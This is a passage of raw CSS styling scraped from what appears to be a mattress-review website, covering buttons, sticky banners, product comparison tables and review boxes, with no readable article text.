(max-width:800px){.sacta-container{display:flex;flex-direction:column}.sacta-container__inner-left{width:100%}.sacta-container__inner-right{width:auto}.sacta-item__button{font-size:14px;padding:8px 3px;max-width:200px}}@media screen and (max-width:450px){.sacta-item__button{font-size:11px;padding:8px 3px;max-width:200px}} /* Sticky Code */ .sasticky-container{max-width:1280px;margin:0 auto;padding:0}.sasticky-items{display:flex;flex-direction:column;font-family:'Open Sans'}div.sasticky-items{position:fixed;left:0;bottom:0;width:100%;z-index:999}.sasticky-item{display:flex;flex-wrap:wrap;border:0 solid #187FD2;border-radius:0;text-decoration:none;flex-wrap:wrap;padding:12px 100px;background-color:#294863}a.sasticky-item:hover{text-decoration:none!important}.sasticky-item__column-features{width:100%;order:1;padding-left:0;padding-right:0}.sasticky-item__column-button{width:100%;order:2}.sasticky-item__column-features{align-items:center;color:black;margin:auto;display:flex}.sasticky-item__description{font-size:16px!important;padding:0;text-align:center;font-weight:normal!important;color:#fff;width:60%;padding-right:10px}.sasticky-item__description span{font-size:16px!important;color:#fff!important;font-weight:normal!important;font-style:normal}.sasticky-item__description b{color:#FB931F;font-weight:700}.sasticky-item__column-button{display:flex;align-items:center;justify-content:center;padding-top:5px}.sasticky-item__button{display:block;max-width:max-content;padding:8px 70px;background:#FB931F;text-align:center;color:#fff;font-family:'Open Sans';font-size:16px;font-weight:500;text-transform:uppercase;text-decoration:none!important;border-radius:8px;-webkit-box-shadow:3px 3px 6px 0 rgba(0,0,0,.3);-moz-box-shadow:3px 3px 6px 0 rgba(0,0,0,.3);box-shadow:3px 3px 6px 0 rgba(0,0,0,.3)}.sasticky-item__button:hover{background-color:#f6b46b!important;color:#fff!important}.sasticky-items p{display:none}.sasticky-star{max-width:105px;margin:auto!important;padding-left:10px;color:#F5A624}.sasticky-star-mobile{max-width:120px;margin:auto;display:none;color:#F5A624}i.fa.fa-star{color:#F5A624;background:none}@media screen and (max-width:765px){.sasticky-item{flex-wrap:wrap;padding:12px}.sasticky-item__column-features,.sasticky-item__column-button,.sasticky-item__description{width:100%;text-align:left}.sasticky-item__column-features{order:3;justify-content:center;width:100%;text-align:left;margin:0 0 0 0;font-size:.9em;text-align:left}.sasticky-item__column-button{order:4}.sasticky-item__description{font-size:14px!important;width:50%;text-align:center;font-weight:bold!important;line-height:1.3}.sasticky-item__description span{font-size:18px!important;display:none}.sasticky-item__button{margin:0 0 0 5px!important;font-family:'Open Sans';font-size:11px;line-height:1.3;text-align:center;padding:8px 25px;width:40%;transition:.2s linear;-webkit-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);-moz-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);box-shadow:0 2px 1px 0 rgba(0,0,0,.3)}.sasticky-star{display:none}.sasticky-star-mobile{display:inline-block;padding-left:10px;padding-right:10px}} .satbl-header{font-family:inherit,sans-serif;font-size:23px;font-weight:700}.satbl-container{max-width:840px!important;margin:0 auto!important}.satbl-features-item-container{padding:0 0 0 40px}.satbl-table{border-spacing:0!important;width:100%!important;border-collapse:unset}.satbl-table p{display:none}.satbl-table__tbody{display:flex;border:1px solid #dcdcdc}a.satbl-table__tbody:any-link{text-decoration:none!important}.satbl-table__column-image{text-align:center!important;margin:auto!important;width:30%!important;vertical-align:middle;padding:5px!important;height:150px}.satbl-table__image{max-height:150px!important;margin:0px!important;height:auto;max-width:70%!important}.satbl-table__column-button{width:30%!important;vertical-align:middle;padding:0 10px 0 5px;margin:auto!important;text-align:center}.satbl-table__column-product{font-family:inherit,sans-serif;width:20%!important;padding:0 5px!important;vertical-align:middle;margin:auto}.satbl-table__column-features{width:20%!important;text-align:center;padding:0 5px;margin:auto;vertical-align:middle}.satbl-table__column-title{text-align:left!important;font-family:inherit,sans-serif;font-size:20px!important;font-weight:bold!important;margin:8px 0 8px 0!important;display:block!important;line-height:1;color:#FB931F}.satbl-table__column-title span{text-align:center!important;text-transform:uppercase!important;text-decoration:none!important;width:100%!important;letter-spacing:.5px!important;font-weight:bold!important;font-size:20px!important;margin:auto 5px!important}.satbl-table__button{display:block!important;background-color:#E70E20!important;line-height:16px!important;text-decoration:none!important;text-transform:uppercase!important;color:#fff!important;font-weight:bolder!important;font-size:12px!important;letter-spacing:0.2px!important;border-radius:8px!important;padding:10px 14px!important;width:auto!important;max-width:200px!important;margin:auto auto;text-align:center!important;transition:.2s linear!important;-webkit-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;-moz-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;box-shadow:0 4px 0 0 rgba(173,12,25,1)!important}.satbl-table__button a:any-link{color:#fff!important}.satbl-table__button:hover{background-color:#AD0C19!important;-webkit-box-shadow:0 4px 0 0 rgba(110,7,16,1)!important;-moz-box-shadow:0 4px 0 0 rgba(110,7,16,1)!important;box-shadow:0 4px 0 0 rgba(110,7,16,1)!important}.satbl-features-item-mobile-container{padding:0 0}.satbl-table__features-item-mobile{line-height:20px;font-family:inherit,sans-serif;padding:0 0 0 25px!important;margin:0px!important;color:#1B486E!important;font-size:16px!important;text-align:left;list-style-type:disc;font-weight:bolder!important;text-align:center;text-transform:uppercase!important}.satbl-table__features-item-mobile li{text-align:left;margin:4px 0 4px 0px!important;line-height:20px;padding-left:0px!important}.satbl-table__features-item-mobile li:empty{display:none}.satbl-table__features-item-mobile span{color:#484848!important;font-size:16px!important;font-weight:400;line-height:1.3;text-align:center;text-transform:none!important}.satbl-table__link{margin:auto auto;width:100%!important;display:block!important;text-decoration:none!important;line-height:1.5;list-style:none!important;padding:auto auto}.satbl-table__link:active,.satbl-table__link:visited{color:#000!important}.satbl-table__link-label{color:#fff!important;position:relative!important;text-transform:uppercase!important;background:#FBDC60!important;border:2px solid #FBDC60!important;padding:4px 4px!important;max-width:max-content!important;clear:both!important}div.satbl-table__link-label{color:#222!important;font-size:12px!important;word-break:keep-all!important;border-bottom-right-radius:0px!important;border-top-left-radius:0px!important;line-height:1!important;font-weight:700}div.satbl-table__link-label:empty{display:none!important}div.satbl-table__link-label span{margin:auto!important}div.satbl-table__link-label::before{display:none;width:10px!important;height:0px!important;position:absolute!important;bottom:-15px!important;left:-12px!important;content:""!important;border-bottom:13px solid transparent!important;border-right:9px solid #AA963F!important}@media screen and (max-width:1020px){.satbl-table__thead-image,.satbl-table__thead-details,.satbl-table__thead th:last-child{display:none!important}.satbl-table__thead-product{width:100%!important;border-top-left-radius:0px!important;border-top-right-radius:0px!important;text-align:center;padding-left:0px!important}.satbl-table__tbody{display:flex!important;flex-wrap:wrap!important}.satbl-table__column-product{width:100%!important;order:1!important;text-align:center!important;padding-top:20px!important;padding-bottom:5px!important;padding-left:0px!important;padding-right:0px!important}.satbl-table__column-image{width:50%!important;order:2!important;margin:0!important;box-sizing:border-box!important;display:flex!important;justify-content:center!important;align-items:center!important}.satbl-table__column-features{order:3!important;width:50%!important;box-sizing:border-box!important;align-items:center!important;margin:0 0;display:flex!important;text-decoration:none!important;line-height:1.5;list-style:none!important;padding:5px 5px 5px 30px;text-align:center}.satbl-table__column-button{width:100%!important;order:4!important;display:flex!important;justify-content:center!important;align-items:center!important;padding-top:10px!important;padding-bottom:15px!important}.satbl-table__button{font-size:15px!important}.satbl-table__features-item-mobile li{margin-bottom:5px!important;font-size:16px}.satbl-table__button{width:100%!important;max-width:max-content!important}.satbl-table__column-title{font-size:20px!important;text-align:center!important;margin:0 10px!important;padding-left:0px!important;display:none!important}.satbl-table__features-item-mobile{display:contents!important}.satbl-table__image{margin:5px 0!important;max-width:90%}div.satbl-table__link-label::before{display:block}div.satbl-table__link-label{margin-left:-9px!important;margin-top:-10px!important;margin-bottom:10px!important}div.satbl-table__link-label::after{content:""!important;position:absolute!important;display:block!important;border:12px solid!important;border-color:#FBDC60 transparent #FBDC60 transparent!important;right:-14px!important;top:-2px!important}} .satbl2-header{font-family:inherit,sans-serif;font-size:23px;font-weight:700}.satbl2-container{max-width:840px!important;margin:0 auto!important}.satbl2-features-item-container{padding:0 0 0 40px}.satbl2-table{border-spacing:0!important;width:100%!important;border-top:1px solid #dcdcdc;border-collapse:unset}.satbl2-table__thead{background-color:#222!important;color:#FFFFFF!important;font-weight:400;padding:7px 7px!important}.satbl2-table__thead th{padding:5px 0;background:#222!important;border:none!important;text-align:center;font-weight:700}.satbl2-table__thead th:first-child{border-top-left-radius:0px!important;font-size:18px;font-weight:bold!important}.satbl2-table__thead th:last-child{border-top-right-radius:0px!important;border-bottom:0px!important}.satbl2-table__thead-image{width:15%!important;border:none;text-align:center;font-size:18px}.satbl2-table__thead-product{width:24%!important;border:none;text-align:center;font-size:18px!important;font-weight:bold!important;padding-left:0px!important}.satbl2-table__thead-button{width:26%;text-align:center;font-size:18px!important;font-weight:bold!important;padding-left:0px!important}.satbl2-table__thead-details{width:35%!important;font-size:18px!important;text-align:center}.satbl2-table__column-image{text-align:center!important;margin:10px 0!important;border-left:1px solid #DCDCDC!important;border-bottom:1px solid #DCDCDC!important;width:30%!important;border-right:none;vertical-align:middle;padding:5px!important;height:150px}.satbl2-table__image{max-height:150px!important;margin:0px!important;height:auto;max-width:70%!important}.satbl2-table__column-button{border-top:0px!important;border-right:1px solid #DCDCDC!important;border-bottom:1px solid #DCDCDC!important;width:30%!important;vertical-align:middle;padding:0 10px 0 5px;text-align:center;border-left:none}.satbl2-table__column-product{font-family:inherit,sans-serif;border-bottom:1px solid #DCDCDC!important;width:20%!important;padding:0 5px!important;border-right:none;border-left:none;vertical-align:middle}.satbl2-table__column-features{width:20%!important;border-bottom:1px solid #DCDCDC!important;text-align:center;border-right:none;padding:0 5px;vertical-align:middle}.satbl2-table__column-title{text-align:left!important;font-family:inherit,sans-serif;font-size:20px!important;font-weight:bold!important;margin:8px 0 8px 0!important;display:block!important;line-height:1.3;color:#FB931F}.satbl2-table__column-title span{text-align:center!important;text-transform:uppercase!important;text-decoration:none!important;width:100%!important;letter-spacing:.5px!important;font-weight:bold!important;font-size:20px!important;margin:auto 5px!important}.satbl2-table__button{display:block!important;background-color:#E70E20!important;line-height:16px!important;text-decoration:none!important;text-transform:uppercase!important;color:#fff!important;font-weight:bolder!important;font-size:12px!important;letter-spacing:0.2px!important;border-radius:8px!important;padding:10px 14px!important;width:auto!important;max-width:200px!important;margin:auto auto;text-align:center!important;transition:.2s linear!important;-webkit-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;-moz-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;box-shadow:0 4px 0 0 rgba(173,12,25,1)!important}.satbl2-table__button:hover{background-color:#AD0C19!important;-webkit-box-shadow:0 4px 0 0 rgba(110,7,16,1)!important;-moz-box-shadow:0 4px 0 0 rgba(110,7,16,1)!important;box-shadow:0 4px 0 0 rgba(110,7,16,1)!important}.satbl2-features-item-mobile-container{padding:0 0}.satbl2-table__features-item-mobile{line-height:20px;font-family:inherit,sans-serif;padding:0 0 0 25px!important;margin:0px!important;color:#1B486E!important;font-size:16px!important;text-align:left;list-style-type:disc;font-weight:bolder!important;text-align:center;text-transform:uppercase!important}.satbl2-table__features-item-mobile li{text-align:left;margin:4px 0 4px 0px!important;line-height:20px;padding-left:0px!important}.satbl2-table__features-item-mobile li:empty{display:none}.satbl2-table__features-item-mobile span{color:#484848!important;font-size:16px!important;font-weight:400;line-height:1.3;text-align:center;text-transform:none!important}.satbl2-table__link{margin:auto auto;width:100%!important;display:block!important;text-decoration:none!important;line-height:1.5;list-style:none!important;padding:auto auto}.satbl2-table__link:active,.satbl2-table__link:visited{color:#000!important}.satbl2-table__link-label{color:#fff!important;margin:30px 0 8px!important;position:relative!important;text-transform:uppercase!important;background:#FBDC60!important;border:2px solid #FBDC60!important;padding:4px 4px!important;max-width:max-content!important;clear:both!important}div.satbl2-table__link-label{color:#222!important;font-size:12px!important;margin-top:5px!important;margin-bottom:5px!important;word-break:keep-all!important;border-bottom-right-radius:0px!important;border-top-left-radius:0px!important;line-height:1!important;font-weight:700}div.satbl2-table__link-label:empty{display:none!important}div.satbl2-table__link-label span{margin:auto!important}div.satbl2-table__link-label::before{display:none;width:10px!important;height:0px!important;position:absolute!important;bottom:-15px!important;left:-12px!important;content:""!important;border-bottom:13px solid transparent!important;border-right:9px solid #AA963F!important}@media screen and (max-width:1020px){.satbl2-table__thead-image,.satbl2-table__thead-details,.satbl2-table__thead th:last-child{display:none!important}.satbl2-table__thead-product{width:100%!important;border-top-left-radius:0px!important;border-top-right-radius:0px!important;text-align:center;padding-left:0px!important}.satbl2-table__tbody{display:block!important;flex-direction:column!important}.satbl2-table__tbody-row{display:flex!important;flex-wrap:wrap!important}.satbl2-table__column-product{width:100%!important;order:1!important;border-bottom:none!important;text-align:center!important;border-left:1px solid #DCDCDC!important;border-right:1px solid #DCDCDC!important;padding-top:20px!important;padding-bottom:5px!important;padding-left:0px!important;padding-right:0px!important}.satbl2-table__column-image{width:50%!important;order:2!important;margin:0!important;box-sizing:border-box!important;border-bottom:none!important;display:flex!important;justify-content:center!important;align-items:center!important;border-top:none}.satbl2-table__column-features{order:3!important;width:50%!important;border-right:1px solid #DCDCDC!important;box-sizing:border-box!important;border-bottom:none!important;align-items:center!important;margin:0 0;display:flex!important;text-decoration:none!important;line-height:1.5;list-style:none!important;padding:5px 5px 5px 30px;text-align:center;border-top:none;border-left:none}.satbl2-table__column-button{width:100%!important;order:4!important;display:flex!important;justify-content:center!important;align-items:center!important;border-left:1px solid #DCDCDC!important;padding-top:10px!important;padding-bottom:15px!important}.satbl2-table__button{font-size:15px!important}.satbl2-table__features-item-mobile li{margin-bottom:5px!important;font-size:16px}.satbl2-table__button{width:100%!important;max-width:max-content!important}.satbl2-table__column-title{font-size:20px!important;text-align:center!important;margin:0 10px!important;padding-left:0px!important;display:none!important}.satbl2-table__features-item-mobile{display:contents!important}.satbl2-table__image{margin:5px 0!important;max-width:90%}div.satbl2-table__link-label::before{display:block}div.satbl2-table__link-label{margin-left:-9px!important;margin-top:-10px!important;margin-bottom:10px!important}div.satbl2-table__link-label::after{content:""!important;position:absolute!important;display:block!important;border:12px solid!important;border-color:#FBDC60 transparent #FBDC60 transparent!important;right:-14px!important;top:-2px!important}} /** Review CTA **/ .sarvw-header{font-family:'Roboto Slab'!important;font-size:24px!important;font-weight:500!important;line-height:1.3;color:#222;text-transform:uppercase}.sarvw-container{max-width:840px;margin:0 auto;padding:20px}.sarvw-items{display:flex;flex-direction:column;font-family:inherit,sans-serif}.sarvw-items p{margin:0}.sarvw-item{display:flex;flex-wrap:wrap;border:5px solid #2a4b80;border-radius:0;text-decoration:none;flex-wrap:wrap;padding:15px 10px 10px;background-color:#fff;position:relative!important;-webkit-box-shadow:0 2px 6px 2px rgba(0,0,0,.3);-moz-box-shadow:0 2px 6px 2px rgba(0,0,0,.3);box-shadow:0 2px 6px 2px rgba(0,0,0,.3)}a.sarvw-item:hover{text-decoration:none!important}.sarvw-item__column-image{width:40%;order:3;margin:auto 0}a.sarvw-item__column-image{text-decoration:none}.sarvw-item__column-features{width:55%;order:4;padding-left:0;padding-right:0;align-items:center;color:black;margin:auto 10px}.sarvw-item__column-button{width:100%;order:5;padding-bottom:5px;padding-top:5px}.sarvw-item__image{max-height:200px;max-width:80%!important;margin:40px auto 10px!important;display:block!important;height:auto;mix-blend-mode:multiply!important;border:none!important}.sarvw__item__image-container{display:block!important;height:auto;margin:auto;mix-blend-mode:multiply!important;border:none!important}.sarvw-item__bar{border-top:3px solid #182733!important;width:25%!important;margin:14px 0px!important}.sarvw-item__title{font-size:22px!important;color:#182733!important;font-weight:600!important;padding:0 0 5px 0;order:2;width:100%;text-align:left;background:-webkit-linear-gradient(#1C8AD1,#0F537E);-webkit-background-clip:text;-webkit-text-fill-color:transparent;line-height:1.2}.sarvw-item__feature{font-size:16px!important;color:#000!important;font-weight:300!important}.sarvw-item__specs{font-size:20px!important;color:#FB931F!important;font-weight:bold!important;padding:0 0 5px 0;text-transform:uppercase}.sarvw-item__specs-list{font-size:20px!important;color:#294863!important;font-weight:300!important;line-height:1.3}ul.sarvw-item__specs-list{margin:0;padding-left:20px;padding-bottom:0}li.sarvw-item__specs-list:empty{display:none}.sarvw-item__specs-list span{font-size:16px!important;color:#000!important;font-weight:300!important;line-height:1.5}.sarvw-item__button{background-color:#E70E20;text-decoration:none;text-transform:uppercase;color:#fff!important;font-family:'Helvetica',sans-serif!important;font-weight:bold!important;font-size:16px!important;letter-spacing:.2px;line-height:1.3;border-radius:8px;padding:8px 25px;max-width:80%;text-align:center!important;transition:.2s linear;-webkit-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;-moz-box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;box-shadow:0 4px 0 0 rgba(173,12,25,1)!important;display:block;margin:10px auto 10px!important}.sarvw-item__button:hover{background-color:#AD0C19!important;-webkit-box-shadow:0 4px 0 0 #6E0710!important;-moz-box-shadow:0 4px 0 0 #6E0710!important;box-shadow:0 4px 0 0 #6E0710!important}.sarvw-item__button a{text-decoration:none}a.sarvw-item__button{text-decoration:none!important}.sarvw-table__link-label{color:#fff!important;text-transform:uppercase!important;background:#FB931F!important;border:2px solid #FB931F!important;padding:4px 4px!important;clear:both!important}div.sarvw-table__link-label{color:#fff!important;font-size:16px!important;font-weight:700;word-break:keep-all!important;border-bottom-right-radius:0px!important;border-top-left-radius:0px!important;line-height:1!important;padding-right:20px!important;padding-left:30px!important;position:absolute!important;top:-16px;left:-14px}div.sarvw-table__link-label:empty{display:none!important}div.sarvw-table__link-label span{margin:auto!important}div.sarvw-table__link-label::before{display:block;width:10px!important;height:0px!important;position:absolute!important;bottom:-15px!important;left:-12px!important;content:""!important;border-bottom:13px solid transparent!important;border-right:9px solid #C37218!important}@media screen and (max-width:1020px){.sarvw-item{flex-wrap:wrap;padding:15px}.sarvw-item__column-features,.sarvw-item__column-button,.sarvw-item__description,.sarvw-item_column-image{width:100%;text-align:left}.sarvw-item__column-features{order:4;justify-content:center;width:100%;text-align:left;margin:0 0 0 0;text-align:left}.sarvw-item__column-image{order:3;width:100%}.sarvw-item__image{max-width:240px!important;margin-top:45px!important}.sarvw-item__description{font-size:16px!important;text-align:center;order:1;width:100%}.sarvw-item__title{font-size:22px!important;font-weight:bold!important;text-align:left;order:2;width:100%;padding-top:0}.sarvw-item__specs{font-size:20px!important;font-weight:bold!important}.sarvw-item__feature{font-size:16px!important;padding-top:5px}.sarvw-item__specs-list{font-size:16px!important}.sarvw-item__specs-list span{font-size:16px!important}.sarvw-item__button{text-decoration:none;text-transform:uppercase;color:#222;font-family:inherit,sans-serif!important;font-weight:600!important;font-size:14px!important;border-radius:4px;padding:10px 14px;max-width:none;min-width:165px;text-align:center!important;transition:.2s linear;margin:0 auto 5px!important;-webkit-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);-moz-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);box-shadow:0 2px 1px 0 rgba(0,0,0,.3);display:block}.sarvw-item__column-button{padding-bottom:0}div.sarvw-table__link-label::before{display:block}div.sarvw-table__link-label{font-size:13px!important}.sarvw-table__link-label{width:auto!important}div.sarvw-table__link-label{max-width:none!important}} </style> <style type="text/css" data-type="vc_custom-css">@media screen and (min-width: 1200px) { .features { z-index:5; margin-top:-100px; } .bigheader { padding-bottom:100px; } .headerrow { padding-top:40px; padding-bottom:40px; } } .maintitle{ font-size: 49px; line-height:55px; color:#2e4475; } .introtext{ font-size: 22px; line-height:25px; color:#425683 } .featurestitle{ font-size: 20px; line-height:25px; font-weight:700; color:#5E5E5E; } h2 { font-size: 35px; color: #2e4475; font-weight: bold; } h3 { font-size: 30px; } .ctatitle { font-size:32px; } @media screen and (min-width: 200px) and (max-width: 1200px) { h3 { font-size:26px; } .features { display: none; } .bigheader { padding-bottom:20px; } .categories { margin-top: 40px; } } @media screen and (min-width: 768px) { .header-inner-row { margin: auto; width:880px; } .header-text { border-right: 1px solid #ffffff; } .header-text-third-column { padding-bottom: 25px; } .header-button { margin-bottom: 0px; } } @media screen and (min-width: 200px) and (max-width: 768px) { .arrow { display:none; } .header-text { padding-bottom: 15px; } .maintitle{ font-size: 33px; line-height:35px; } } .vc_section[data-vc-full-width] > .vc_row { margin-left: auto; margin-right: auto; } .news .detail h3 { font-size: 15px; line-height: 15px; } .news .detail p { display:none; } .btn_more, .news .heart_thumb_wrap { display:none; } .no_bordered_news .news { margin-bottom: 10px; } }</style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1517915214677{margin-top: 20px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(https://www.sleepadvisor.org/wp-content/uploads/2018/01/Header-Mattress-Background-Image.jpg?id=14028) !important;}.vc_custom_1518006225027{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915271076{margin-top: -20px !important;}.vc_custom_1518701176624{margin-top: 20px !important;margin-bottom: 50px !important;}.vc_custom_1517909363486{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543916851877{margin-top: 0px !important;margin-bottom: 20px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-color: rgba(66,86,131,0.8) !important;*background-color: rgb(66,86,131) !important;border-radius: 35px !important;}.vc_custom_1516299613563{padding-top: 0px !important;}.vc_custom_1518077275191{margin-bottom: 30px !important;padding-bottom: 0px !important;}.vc_custom_1517912211569{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 10px !important;padding-bottom: 10px !important;}.vc_custom_1517924280599{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1518004095548{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517924257956{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517912508624{margin-top: 0px !important;margin-bottom: 0px !important;border-right-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517924582035{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517925983858{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517925997696{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517925039810{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543919273805{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543916726466{margin-top: 0px !important;margin-bottom: 20px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543919293385{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543918125016{margin-top: 0px !important;margin-bottom: 40px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543919305866{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1543918130134{margin-top: 0px !important;margin-bottom: 40px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517912508624{margin-top: 0px !important;margin-bottom: 0px !important;border-right-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517924569559{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915152986{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915203087{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915098676{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915113993{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915124215{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1517915138559{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1518016918215{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 4px !important;padding-bottom: 4px !important;border-left-color: #dd8500 !important;border-left-style: dashed !important;border-right-color: #dd8500 !important;border-right-style: dashed !important;border-top-color: #dd8500 !important;border-top-style: dashed !important;border-bottom-color: #dd8500 !important;border-bottom-style: dashed !important;}.vc_custom_1518006041697{padding-top: 30px !important;padding-bottom: 30px !important;}.vc_custom_1518006722458{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1518006507887{margin-top: 0px !important;padding-top: 0px !important;}.vc_custom_1516299613563{padding-top: 0px !important;}.vc_custom_1516306772510{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1516301867656{margin-top: 0px !important;margin-bottom: 10px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1516306889721{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1516353306812{padding-top: 20px !important;padding-bottom: 20px !important;background-color: #2e4475 !important;}.vc_custom_1516353600475{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.95) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1518013201145{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.9) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1516301408538{margin-bottom: 0px !important;}.vc_custom_1518012785465{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838216837{margin-bottom: 0px !important;}.vc_custom_1516301398814{margin-bottom: 0px !important;}.vc_custom_1518012811877{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838234858{margin-bottom: 0px !important;}.vc_custom_1516301384141{margin-bottom: 0px !important;}.vc_custom_1518012829065{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838263616{margin-bottom: 0px !important;}.vc_custom_1516353386517{padding-top: 20px !important;padding-bottom: 20px !important;background-color: #2e4475 !important;}.vc_custom_1516353576172{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.95) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1516353560545{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.9) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1516301659983{margin-bottom: 0px !important;}.vc_custom_1518012852385{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838347964{margin-bottom: 0px !important;}.vc_custom_1516301681861{margin-bottom: 0px !important;}.vc_custom_1518012869943{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838372761{margin-bottom: 0px !important;}.vc_custom_1516301705322{margin-bottom: 0px !important;}.vc_custom_1518012889630{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838393943{margin-bottom: 0px !important;}.vc_custom_1516353498560{padding-top: 20px !important;padding-bottom: 20px !important;background-color: #2e4475 !important;}.vc_custom_1516353541291{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.95) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1516353527685{padding-top: 20px !important;padding-bottom: 20px !important;background-color: rgba(46,68,117,0.9) !important;*background-color: rgb(46,68,117) !important;}.vc_custom_1516301774725{margin-bottom: 0px !important;}.vc_custom_1518012911831{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838416175{margin-bottom: 0px !important;}.vc_custom_1537775807965{margin-bottom: 0px !important;}.vc_custom_1518012930246{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838437310{margin-bottom: 0px !important;}.vc_custom_1516301819988{margin-bottom: 0px !important;}.vc_custom_1518012948358{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1517838453310{margin-bottom: 0px !important;}.vc_custom_1518014406578{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1518014121428{margin-top: 0px !important;margin-bottom: 30px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1518016178895{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016217732{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016305679{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016361503{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016389859{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016745349{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016711901{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016797479{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518016857904{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518017243952{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1518017276541{margin-bottom: 20px !important;padding-bottom: 0px !important;}.vc_custom_1516613415993{margin-bottom: 10px !important;padding-bottom: 0px !important;}.vc_custom_1518006536498{margin-top: 0px !important;padding-top: 0px !important;}.vc_custom_1518701351890{margin-bottom: 10px !important;}.vc_custom_1517922215080{padding-right: 0px !important;padding-bottom: 10px !important;padding-left: 0px !important;}.vc_custom_1517922225105{padding-right: 0px !important;padding-bottom: 10px !important;padding-left: 0px !important;}.vc_custom_1517922237312{padding-right: 0px !important;padding-bottom: 10px !important;padding-left: 0px !important;}.vc_custom_1517919473413{padding-top: 10px !important;padding-right: 10px !important;padding-bottom: 5px !important;padding-left: 10px !important;background-color: #2e4475 !important;}.vc_custom_1517922119521{margin-bottom: 0px !important;}.vc_custom_1517919528609{padding-top: 10px !important;padding-right: 10px !important;padding-bottom: 5px !important;padding-left: 10px !important;background-color: #394e7c !important;}.vc_custom_1517920971364{margin-bottom: 0px !important;}.vc_custom_1517919580017{padding-top: 10px !important;padding-right: 10px !important;padding-bottom: 5px 